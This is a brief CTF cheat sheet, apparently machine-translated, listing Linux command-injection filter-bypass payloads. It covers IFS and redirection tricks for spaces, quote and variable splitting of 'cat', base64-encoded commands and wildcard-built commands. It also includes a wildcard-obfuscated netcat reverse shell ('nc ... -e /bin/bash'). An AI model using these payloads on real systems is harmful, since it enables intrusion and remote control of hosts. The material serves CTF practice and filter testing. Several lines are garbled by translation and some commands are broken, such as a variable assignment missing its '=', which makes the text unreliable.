Preface:
Often encounter some of the timing of the match ctf do some linux commands to filter out here will summarize some specific ways to bypass.
First, bypassing the space:
{cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\ X20 space is converted to a string, here cleverly bypassed by way of variable)
Second, the sensitive character bypass:
Assume filtered cat
1. The use of variable bypass:
ac;b=at;$a$b
2. The bypass coded using base
`echo 'Y2F0Cg==' | base64 -d` test.txt
3. Truncated bypass connector:
c'a't test.txt c\at test.txt ca$@t test.txt
Third, bypassing the wildcard
? In linux which can be replaced by an arbitrary character:
/ ??? / [L- n-] Alternatively S LS
/ ??? / C? T cat test.txt Alternatively test.txt
* In linux which can be replaced by any number of any character:
ls * .php list all php files in the current directory
No Alphanumeric match:
If we encounter will be a positive $ alphanumeric these are filtered out, we want to execute a script, then
if the script name chakdiD and in the root directory / etc, we can use:
. /???/???????[@-[]
[@ - [] indicate to take from the @ character [between the characters that are between uppercase. This realization of the non-alphanumeric order matching, you can bypass the regular.
To a matching table:
character | Explanation |
* |
Matches any character of any length |
? |
Matches any single character |
[list] |
Matching the specified range (list) any single character, or may be a collection of individual characters |
[^list] |
Matches any single character or a character set outside the specified range |
[!list] |
With [^ list] |
{Str1, str2, ...} |
Srt1 matching string or srt2 or more, may be set |
A few examples:
/???/[:lower:]s /?s?/???/[n]c 2130706433 8888 -e /???/b??h {ls / ru / tmp} n
Character map Reference: https://www.secpulse.com/archives/96374.html
Reference Gangster use wildcards: https://www.freebuf.com/articles/web/186298.html